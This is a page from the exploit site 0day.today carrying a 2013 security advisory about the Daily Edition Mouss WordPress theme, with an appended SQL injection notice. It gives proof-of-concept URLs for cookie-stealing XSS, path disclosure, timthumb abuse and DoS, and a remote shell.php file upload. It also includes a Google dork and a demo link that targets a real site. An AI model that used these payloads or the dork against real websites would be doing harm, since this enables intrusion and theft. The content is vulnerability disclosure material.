0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WordPress Dailyedition-mouss Multiple Vulnerabilities
[I want to warn you about multiple vulnerabilities in Daily Edition Mouss theme for WordPress. In 2011 when I wrote about Cross-Site Scripting (WASC-08), Full path disclosure (WASC-13), Abuse of Functionality (WASC-42) and Denial of Service (WASC-10) vulnerabilities in TimThumb and multiple themes for WordPress (http://websecurity.com.ua/4910/), and later also was disclosed Arbitrary File Uploading (WASC-31) vulnerability, I've mentioned about Daily Edition theme among vulnerable themes for WordPress. Ashiyane Digital Security Team released advisory about SQL injection vulnerability in Daily Edition Mouss theme (http://packetstormsecurity.com/files/118242/WordPress-Dailyedition-mouss-SQL-Injection.html). I'll supplement it with new vulnerabilities. It looks like that this is Daily Edition from WooThemes (original version under different path at the site or modified version of the theme). So besides SQL Injection it also has holes from TimThumb and many other vulnerabilities. These are Information Leakage, Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service and Arbitrary File Upload vulnerabilities. ------------------------- Affected products: ------------------------- Vulnerable are all versions of Daily Edition Mouss theme for WordPress (to SQLi, IL, XSS, FPD and to AoF, DoS, AFU only earlier versions are vulnerable). ---------- Details: ---------- Information Leakage (SQL DB Structure Extraction) (WASC-13): http://site/wp-content/themes/dailyedition-mouss//fiche-disque.php Leakage of SQL query with tables' names (including table prefix). XSS (WASC-08): http://site/wp-content/themes/dailyedition-mouss//fiche-disque.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Full path disclosure (WASC-13): http://site/wp-content/themes/dailyedition-mouss/ Besides index.php there are also potentially FPD in other php-files of this theme. XSS (WASC-08): http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E.jpg Full path disclosure (WASC-13): http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http:// http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/page.png&h=1&w=1111111 http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/page.png&h=1111111&w=1 Abuse of Functionality (WASC-42): http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site&h=1&w=1 http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site.flickr.com&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on) DoS (WASC-10): http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/big_file&h=1&w=1 http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site.flickr.com/big_file&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on) About such Abuse of Functionality and Denial of Service vulnerabilities you can read in my article Using of the sites for attacks on other sites (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html). Arbitrary File Upload (WASC-31): http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://flickr.com.site.com/shell.php AoF, DoS, AFU vulnerabilities are not working in last version of the theme (where I've tested them). It can be due to protection against AFU hole in TimThumb. But they must work in earlier versions of this theme. ------------ Timeline: ------------ 2013.01.13 - found vulnerabilities. 2013.01.14 - disclosed to the lists. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ((|))((|))((|))################((|))########################((|)) # Exploit Title: Wordpress Dailyedition-mouss Theme ((|)) # SQL Injection Vulnerability ((|)) # Google Dork: inurl:/dailyedition-mouss/fiche-disque.php # # Exploit Author: Ashiyane Digital Security Team # # Category: Web Application # # Tested on: Windows 7 # ###############################((|))############################# #******************************((|))****************************# #* Location: http://site.com/wp-content/ # #* /themes/dailyedition-mouss/ # #* fiche-disque.php?id=[SQLi] # #* Demo: http://hotnewrap.net/wp-content/plugins/ # #* dailyedition-mouss/fiche-disque.php?id=null' # # 0day.today [2024-11-16] #